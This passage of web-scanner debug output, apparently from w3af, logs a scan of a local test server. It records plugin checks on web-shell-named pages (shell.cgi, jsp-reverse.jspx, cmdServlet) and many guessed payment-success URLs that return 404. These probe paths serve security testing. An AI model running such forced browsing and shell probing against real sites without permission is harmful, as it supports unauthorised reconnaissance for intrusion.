1.00s to run [Wed Feb 12 09:41:42 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/shell.cgi") took 1.00s to run [Wed Feb 12 09:41:42 2020 - debug] url_session.grep(uri="http://localhost:9090/shell.cgi") took 1.02s to run [Wed Feb 12 09:41:42 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/shell.cgi") took 1.02s to run [Wed Feb 12 09:41:42 2020 - debug] http_in_body.grep(uri="http://localhost:9090/shell.cgi") took 1.02s to run [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/inc/payment returned HTTP code "404" (id=2854,from_cache=0,grep=1,rtt=0.12,did=Oc18ZbQ9) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/includes/final.py returned HTTP code "404" (id=2856,from_cache=0,grep=1,rtt=0.22,did=CFEcfWQM) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.php5 returned HTTP code "404" (id=2852,from_cache=0,grep=1,rtt=0.53,did=wLRlTlsh) [Wed Feb 12 09:41:42 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/shell.cgi") took 1.17s to run [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/module/success.php3 returned HTTP code "404" (id=2860,from_cache=0,grep=1,rtt=0.16,did=YLP0EdvW) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/inc/paymentsuccess returned HTTP code "404" (id=2859,from_cache=0,grep=1,rtt=0.11,did=tbCUBbQc) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/inc/pay returned HTTP code "404" (id=2858,from_cache=0,grep=1,rtt=0.10,did=oqXk4o3T) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/modules/validpay.php4 returned HTTP code "404" (id=2853,from_cache=0,grep=1,rtt=0.14,did=fJfvZyOY) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/inc/complete.php returned HTTP code "404" (id=2855,from_cache=0,grep=1,rtt=0.08,did=p3ldbZy6) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/modules/paid.asp returned HTTP code "404" (id=2861,from_cache=0,grep=1,rtt=0.08,did=FmSo3JCD) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/includes/successful.cgi returned HTTP code "404" (id=2857,from_cache=0,grep=1,rtt=0.74,did=ZhnXGf93) [Wed Feb 12 09:41:42 2020 - debug] symfony.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] svn_users.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] private_ip.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] motw.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] meta_generator.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] retirejs.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] file_upload.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] expect_ct.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] localhost:9090 connection pool stats (free:52 / in_use:2 / max:50 / total:54) [Wed Feb 12 09:41:42 2020 - debug] Connections with more in use time: (5458bbfc0690fc2a, 0.15 sec) (62e87e81607155f6, 0.04 sec) [Wed Feb 12 09:41:42 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:42 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:42 2020 - debug] serialized_object.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] blank_body.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] websockets_links.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] csp.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] dom_xss.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] vulners_db.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] keys.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] clamav.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] credit_cards.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] objects.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] error_500.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] meta_tags.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] password_profiling.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] click_jacking.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] lang.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.php4 returned HTTP code "404" (id=2863,from_cache=0,grep=1,rtt=0.22,did=rexE2rei) [Wed Feb 12 09:41:42 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1283, 'reject-seen-url': 1124, 'reject-out-of-scope': 32, 'accept': 211} [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/module/finished.php5 returned HTTP code "404" (id=2867,from_cache=0,grep=1,rtt=0.22,did=FqPAUein) [Wed Feb 12 09:41:42 2020 - debug] get_emails.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 2.85s to run [Wed Feb 12 09:41:42 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/includes/paymentsuccess returned HTTP code "404" (id=2864,from_cache=0,grep=1,rtt=0.09,did=LercObtL) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/libraries/paymentsuccessful.aspx returned HTTP code "404" (id=2866,from_cache=0,grep=1,rtt=0.22,did=fzjA4LO5) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/module/valid.php3 returned HTTP code "404" (id=2862,from_cache=0,grep=1,rtt=0.16,did=FYFR0IJT) [Wed Feb 12 09:41:42 2020 - debug] error_pages.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.23s to run [Wed Feb 12 09:41:42 2020 - debug] strange_reason.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/module/validation.php4 returned HTTP code "404" (id=2869,from_cache=0,grep=1,rtt=0.08,did=3tFPzJ3n) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/modules/return.cgi returned HTTP code "404" (id=2872,from_cache=0,grep=1,rtt=0.26,did=Kis2ifTh) [Wed Feb 12 09:41:43 2020 - debug] GET http://localhost:9090/inc/completepayment.cgi returned HTTP code "404" (id=2870,from_cache=0,grep=1,rtt=0.07,did=HSLd2pN3) [Wed Feb 12 09:41:43 2020 - debug] POST http://localhost:9090/module/transactioncomplete.php4 returned HTTP code "404" (id=2877,from_cache=0,grep=1,rtt=0.11,did=jgJocuvY) [Wed Feb 12 09:41:43 2020 - debug] GET http://localhost:9090/includes/completepay.php returned HTTP code "404" (id=2865,from_cache=0,grep=1,rtt=0.19,did=NJuVwwam) [Wed Feb 12 09:41:43 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:43 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:43 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:43 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:43 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:43 2020 - debug] http_in_body.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.75s to run [Wed Feb 12 09:41:43 2020 - debug] cache_control.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:43 2020 - debug] strange_headers.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:43 2020 - debug] ssn.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:43 2020 - debug] oracle.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:43 2020 - debug] feeds.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:43 2020 - debug] GET http://localhost:9090/servlet/pay.php returned HTTP code "404" (id=2868,from_cache=0,grep=1,rtt=0.14,did=fDazn3aQ) [Wed Feb 12 09:41:43 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.78s to run [Wed Feb 12 09:41:43 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.66s to run [Wed Feb 12 09:41:43 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.66s to run [Wed Feb 12 09:41:43 2020 - debug] POST http://localhost:9090/module/validatepayment.php5 returned HTTP code "404" (id=2871,from_cache=0,grep=1,rtt=0.11,did=xLxGcESd) [Wed Feb 12 09:41:43 2020 - debug] GET http://localhost:9090/servlet/paid.cgi returned HTTP code "404" (id=2873,from_cache=0,grep=1,rtt=0.14,did=6UhTW0mZ) [Wed Feb 12 09:41:43 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.69s to run [Wed Feb 12 09:41:43 2020 - debug] url_session.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.68s to run [Wed Feb 12 09:41:43 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.00s to run [Wed Feb 12 09:41:44 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:44 2020 - debug] GET http://localhost:9090/libraries/valid.php4 returned HTTP code "404" (id=2878,from_cache=0,grep=1,rtt=0.31,did=O41QCiNK) [Wed Feb 12 09:41:44 2020 - debug] GET http://localhost:9090/module/return.aspx returned HTTP code "404" (id=2876,from_cache=0,grep=1,rtt=0.23,did=hTNj3czf) [Wed Feb 12 09:41:44 2020 - debug] html_comments.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.65s to run [Wed Feb 12 09:41:45 2020 - debug] POST http://localhost:9090/module/validatepay returned HTTP code "404" (id=2879,from_cache=0,grep=1,rtt=0.31,did=hwUn1mlO) [Wed Feb 12 09:41:45 2020 - debug] POST http://localhost:9090/servlet/final.php3 returned HTTP code "404" (id=2875,from_cache=0,grep=1,rtt=0.17,did=5nRMgVli) [Wed Feb 12 09:41:45 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 137. [Wed Feb 12 09:41:45 2020 - debug] localhost:9090 connection pool stats (free:44 / in_use:8 / max:50 / total:52) [Wed Feb 12 09:41:45 2020 - debug] Connections with more in use time: (feefb3b1646a9d56, 0.55 sec) (a5419411797e137e, 0.52 sec) (d49dc8e833c97ce2, 0.36 sec) (5458bbfc0690fc2a, 0.33 sec) (e665f0bd92d82ae1, 0.33 sec) [Wed Feb 12 09:41:45 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 0.38s to run [Wed Feb 12 09:41:45 2020 - debug] GET http://localhost:9090/includes/validate.php4 returned HTTP code "404" (id=2874,from_cache=0,grep=1,rtt=0.13,did=XnIKzcoq) [Wed Feb 12 09:41:45 2020 - debug] GET http://localhost:9090/servlet/payment.php4 returned HTTP code "404" (id=2882,from_cache=0,grep=1,rtt=0.04,did=3yXt7X37) [Wed Feb 12 09:41:45 2020 - debug] POST http://localhost:9090/includes/final.jsp returned HTTP code "404" (id=2883,from_cache=0,grep=1,rtt=0.19,did=BqQcNcTo) [Wed Feb 12 09:41:46 2020 - debug] POST http://localhost:9090/module/finished.php returned HTTP code "404" (id=2884,from_cache=0,grep=1,rtt=0.21,did=UDGxNsp9) [Wed Feb 12 09:41:46 2020 - debug] POST http://localhost:9090/inc/paymentsuccess.cgi returned HTTP code "404" (id=2880,from_cache=0,grep=1,rtt=0.06,did=WYbUqlbQ) [Wed Feb 12 09:41:46 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:46 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:46 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.aspx returned HTTP code "404" (id=2886,from_cache=0,grep=1,rtt=0.18,did=bhPJBJnn) [Wed Feb 12 09:41:46 2020 - debug] GET http://localhost:9090/modules/success.cgi returned HTTP code "404" (id=2889,from_cache=0,grep=1,rtt=0.41,did=z8Hjo3sw) [Wed Feb 12 09:41:46 2020 - debug] POST http://localhost:9090/includes/paymentsuccess.cgi returned HTTP code "404" (id=2896,from_cache=0,grep=1,rtt=0.70,did=0HHdhiJI) [Wed Feb 12 09:41:46 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1294, 'reject-seen-url': 1138, 'reject-out-of-scope': 32, 'accept': 211} [Wed Feb 12 09:41:46 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:47 2020 - debug] symfony.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:47 2020 - debug] private_ip.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:47 2020 - debug] motw.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:47 2020 - debug] GET http://localhost:9090/servlet/transactioncomplete.cgi returned HTTP code "404" (id=2887,from_cache=0,grep=1,rtt=0.18,did=ZtJZJwPG) [Wed Feb 12 09:41:47 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:47 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:47 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:47 2020 - debug] POST http://localhost:9090/modules/validpay.php5 returned HTTP code "404" (id=2895,from_cache=0,grep=1,rtt=0.67,did=jeZA1kdX) [Wed Feb 12 09:41:47 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] GET http://localhost:9090/libraries/validatepayment.php5 returned HTTP code "404" (id=2885,from_cache=0,grep=1,rtt=0.14,did=AP9ibVtH) [Wed Feb 12 09:41:48 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] POST http://localhost:9090/modules/paid.py returned HTTP code "404" (id=2881,from_cache=0,grep=1,rtt=0.32,did=WMv7V86b) [Wed Feb 12 09:41:48 2020 - debug] GET http://localhost:9090/inc/payment returned HTTP code "404" (id=2891,from_cache=0,grep=1,rtt=0.41,did=OLICj2rD) [Wed Feb 12 09:41:48 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:48 2020 - debug] POST http://localhost:9090/inc/complete.aspx returned HTTP code "404" (id=2892,from_cache=0,grep=1,rtt=0.56,did=hZr1rI0X) [Wed Feb 12 09:41:48 2020 - debug] GET http://localhost:9090/includes/paymentsuccessful.cgi returned HTTP code "404" (id=2893,from_cache=0,grep=1,rtt=0.44,did=LPE2vXkh) [Wed Feb 12 09:41:48 2020 - debug] expect_ct.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.09s to run [Wed Feb 12 09:41:48 2020 - debug] retirejs.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:48 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:48 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:48 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:49 2020 - debug] serialized_object.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] blank_body.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] credit_cards.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] websockets_links.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] csp.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] vulners_db.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] get_emails.grep(uri="http://localhost:9090/shell.cgi") took 2.76s to run [Wed Feb 12 09:41:49 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] keys.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] GET http://ajax.googleapis.com/ajax/services/search/web?q=site:localhost inurl:"/cms/app/webroot"&start=0&rsz=8&v=1.0 returned HTTP code "200" (id=2888,from_cache=0,grep=1,rtt=1.32,did=r83uCOhx) [Wed Feb 12 09:41:49 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:49 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] clamav.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] svn_users.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.17s to run [Wed Feb 12 09:41:49 2020 - debug] file_upload.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] POST http://localhost:9090/module/trxcomplete returned HTTP code "404" (id=2890,from_cache=0,grep=1,rtt=0.35,did=4WkGucs2) [Wed Feb 12 09:41:49 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.php5 returned HTTP code "404" (id=2897,from_cache=0,grep=1,rtt=0.08,did=KBInZxQ0) [Wed Feb 12 09:41:49 2020 - debug] GET http://localhost:9090/inc/pay returned HTTP code "404" (id=2899,from_cache=0,grep=1,rtt=0.19,did=m2MxLBFO) [Wed Feb 12 09:41:49 2020 - debug] GET http://localhost:9090/includes/successful.cgi returned HTTP code "404" (id=2894,from_cache=0,grep=1,rtt=0.14,did=V9GCReLv) [Wed Feb 12 09:41:49 2020 - debug] meta_generator.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:49 2020 - debug] GET http://localhost:9090/modules/pay.php3 returned HTTP code "404" (id=2898,from_cache=0,grep=1,rtt=0.33,did=YaTexnyd) [Wed Feb 12 09:41:49 2020 - debug] dom_xss.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] POST http://localhost:9090/libraries/paymentsuccessful.pl returned HTTP code "404" (id=2901,from_cache=0,grep=1,rtt=0.37,did=rRaZFppi) [Wed Feb 12 09:41:50 2020 - debug] Invalid JSON format returned by Google, response status needs to be 200, got "The Google Web Search API is no longer available. Please migrate to the Google Custom Search API (https://developers.google.com/custom-search/)" instead. [Wed Feb 12 09:41:50 2020 - debug] POST http://localhost:9090/includes/validate.php5 returned HTTP code "404" (id=2904,from_cache=0,grep=1,rtt=0.11,did=uyB944kw) [Wed Feb 12 09:41:50 2020 - debug] GET http://localhost:9090/module/transactioncomplete.php4 returned HTTP code "404" (id=2905,from_cache=0,grep=1,rtt=0.19,did=rpJLFQvs) [Wed Feb 12 09:41:50 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] objects.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] error_500.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] meta_tags.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] password_profiling.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] click_jacking.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] lang.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] error_pages.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.02s to run [Wed Feb 12 09:41:50 2020 - debug] strange_reason.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] cache_control.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] strange_headers.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] ssn.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] oracle.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] POST http://localhost:9090/servlet/paid.asp returned HTTP code "404" (id=2906,from_cache=0,grep=1,rtt=0.20,did=tNORTsa5) [Wed Feb 12 09:41:50 2020 - debug] feeds.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.00s to run [Wed Feb 12 09:41:50 2020 - debug] POST http://localhost:9090/includes/completepay.aspx returned HTTP code "404" (id=2907,from_cache=0,grep=1,rtt=0.25,did=Nk5edrGN) [Wed Feb 12 09:41:50 2020 - debug] POST http://localhost:9090/servlet/pay.aspx returned HTTP code "404" (id=2903,from_cache=0,grep=1,rtt=0.18,did=HPF9HxZ2) [Wed Feb 12 09:41:50 2020 - debug] POST http://localhost:9090/libraries/valid.php5 returned HTTP code "404" (id=2908,from_cache=0,grep=1,rtt=0.23,did=VB91KAwc) [Wed Feb 12 09:41:50 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.09s to run [Wed Feb 12 09:41:50 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:4 / max:50 / total:52) [Wed Feb 12 09:41:50 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.09 sec) (feefb3b1646a9d56, 0.05 sec) (62e87e81607155f6, 0.02 sec) (20c6fb7a85d275d0, 0.01 sec) [Wed Feb 12 09:41:50 2020 - debug] GET http://localhost:9090/module/validatepayment.php5 returned HTTP code "404" (id=2909,from_cache=0,grep=1,rtt=0.13,did=CaRLQ6Y3) [Wed Feb 12 09:41:50 2020 - debug] GET http://localhost:9090/servlet/final.php3 returned HTTP code "404" (id=2913,from_cache=0,grep=1,rtt=0.17,did=NXFEamqx) [Wed Feb 12 09:41:51 2020 - debug] POST http://localhost:9090/module/return.pl returned HTTP code "404" (id=2914,from_cache=0,grep=1,rtt=0.23,did=GSLBLj6U) [Wed Feb 12 09:41:51 2020 - debug] POST http://localhost:9090/servlet/transactioncomplete.asp returned HTTP code "404" (id=2915,from_cache=0,grep=1,rtt=0.18,did=wXYRLaMb) [Wed Feb 12 09:41:51 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1307, 'reject-seen-url': 1149, 'reject-out-of-scope': 33, 'accept': 211} [Wed Feb 12 09:41:51 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:41:51 2020 - debug] POST http://localhost:9090/servlet/payment.php5 returned HTTP code "404" (id=2911,from_cache=0,grep=1,rtt=0.37,did=2O7300Lu) [Wed Feb 12 09:41:51 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 136. [Wed Feb 12 09:41:51 2020 - debug] GET http://localhost:9090/modules/return.cgi returned HTTP code "404" (id=2910,from_cache=0,grep=1,rtt=0.09,did=5YwgGN5g) [Wed Feb 12 09:41:51 2020 - debug] GET http://localhost:9090/includes/final.jsp returned HTTP code "404" (id=2919,from_cache=0,grep=1,rtt=0.24,did=IOnDHyVV) [Wed Feb 12 09:41:52 2020 - debug] GET http://localhost:9090/module/validation.php4 returned HTTP code "404" (id=2916,from_cache=0,grep=1,rtt=0.27,did=frQC5duH) [Wed Feb 12 09:41:52 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.php returned HTTP code "404" (id=2921,from_cache=0,grep=1,rtt=0.19,did=VowIPlR5) [Wed Feb 12 09:41:52 2020 - debug] POST http://localhost:9090/modules/valid returned HTTP code "404" (id=2920,from_cache=0,grep=1,rtt=0.16,did=DadfWpso) [Wed Feb 12 09:41:52 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.pl returned HTTP code "404" (id=2912,from_cache=0,grep=1,rtt=0.29,did=fefiPrvH) [Wed Feb 12 09:41:52 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:41:52 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: LmWTLzzj) [Wed Feb 12 09:41:52 2020 - debug] GET http://localhost:9090/module/validatepay returned HTTP code "404" (id=2917,from_cache=0,grep=1,rtt=0.05,did=T03DgV9k) [Wed Feb 12 09:41:52 2020 - debug] POST http://localhost:9090/modules/success.asp returned HTTP code "404" (id=2922,from_cache=0,grep=1,rtt=0.33,did=Gg6z1ta1) [Wed Feb 12 09:41:52 2020 - debug] POST http://localhost:9090/module/transactioncomplete.php5 returned HTTP code "404" 